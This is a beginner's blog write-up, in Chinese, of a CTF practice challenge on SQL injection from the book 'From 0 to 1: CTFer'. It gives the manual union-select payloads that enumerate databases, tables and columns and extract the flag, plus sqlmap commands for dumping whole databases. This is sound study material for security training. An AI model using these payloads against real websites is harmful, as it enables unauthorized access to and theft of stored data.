《从0到1:CTFer成长之路》SQL注入-1
前言:
我是新手小白,创建此文章只为了记录自己的学习
题目:
我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入
手工方法:
题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。
网址存在id=1,可能存在注入点,手工一下看看是否存在。
先用 ' 试一下,返回了一个错误页面,再用and 1=1 试一下,返回正确的页面,再次试一下and 1=2,返回的是错误的页面,那么即可注入;
and 1=1返回一个错误页面?会不会是' 后面把and 1=1闭合掉了?
尝试一下把后面注释掉看看是否是闭合掉了:使用--+看一下;
返回了正确的页面,可以确定后面是有闭合的;
既然知道有了闭合和注入,下面开始查询一下输出位:
先构造order by 函数判断一下列数,建议使用二分法,我喜欢从十开始,这边直接看结果吧;
order by 3回显正确,说明列数是3;下面构造函数确定输出位:union select 1,2,3
既然知道了回显位置,下面就构造函数查库、表、列了。
查库:union select 1,database(),3 --+
查表:union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' --+ //note是上面库的名
查列: union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' --+ //fl4g是上面查询到的表
查看记录就能得到flag了:union select 1,group_concat(fllllag),3 from fl4g --+ //fllllag是上面查询到的
上面就是手工方式解出flag的步骤,下面写sqlmap跑法
sqlmap
直接用sqlmap -u 检测一下
是存在注入的;
sqlmap -u URL --dbs --batch //获取全部数据库
sqlmap -u URL --current-db --batch //获取当前数据库
sqlmap -u URL -D 数据库名 --tables --batch //获取当前数据库里所有表
sqlmap -u URL -D 数据库名 -T 表名 --columns --batch //获取表的字段
sqlmap -u URL -D 数据库名 -T 表名 -C "字段内容" --dump --batch //dump字段内容
如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据
--dump 可以换成 --dump-all则导出全部的内容
按照这个步骤一步一步下来就好了,截图我放下面了:
以上就是本次的flag :n1book{union_select_is_so_cool}
手注十分繁琐,可以使用sqlmap方便一点
《从0到1:CTFer成长之路》SQL注入-1相关推荐
- 从0到1:CTFer成长之路
作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-01 从0到1:CTFer成长之路
- 《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集
<从0到1:CTFer成长之路> [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1 ...
- 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2
[第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...
- 从0到1:CTFer成长之路docker环境搭建
1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使 ...
- 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) sh ...
- 《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=../../../etc/passwd 读不到flag /proc详解 linux进程与它的文件描述符./p ...
最新文章
- ImportError: cannot import name ‘image‘ from ‘PIL‘ (C:\ProgramData\Anaconda3\lib\site-packages\PIL\_
- Linu解决oracle连接不稳定
- 老子《道德经》第三十三章
- Linux 实现网页劫持,Linux下实现劫持系统调用的总结(上)--代码及实现
- 算法题解:旋转数组的最小数字
- JAVA50道经典编程题
- cas单点登录-https的配置(一)
- 蓝桥杯 ADV-65 算法提高 格子位置
- 找回 Windows 11 丢失的扫雷游戏【新春快乐】
- ORACLE11gR2安装XDB
- 凯文·凯利又出预言:未来科技将由这四股力量推动!
- ERP标准物料编码规则指南
- 【快讯通知】江苏省2022年度社会保险有关基数通知
- windows命令行XCOPY命令
- MATLAB之傅里叶展开(五)
- C/C++黑魔法-字符串分割
- H.266/VVC代码学习21:帧内角度预测的实现 / 近对角模式的PDPC(xPredIntraAng)
- ImageNet的top-1终于上了90%,然而谷歌却遭众网友吐槽
- SSM实现点餐系统(含源码)
- Linux 交叉编译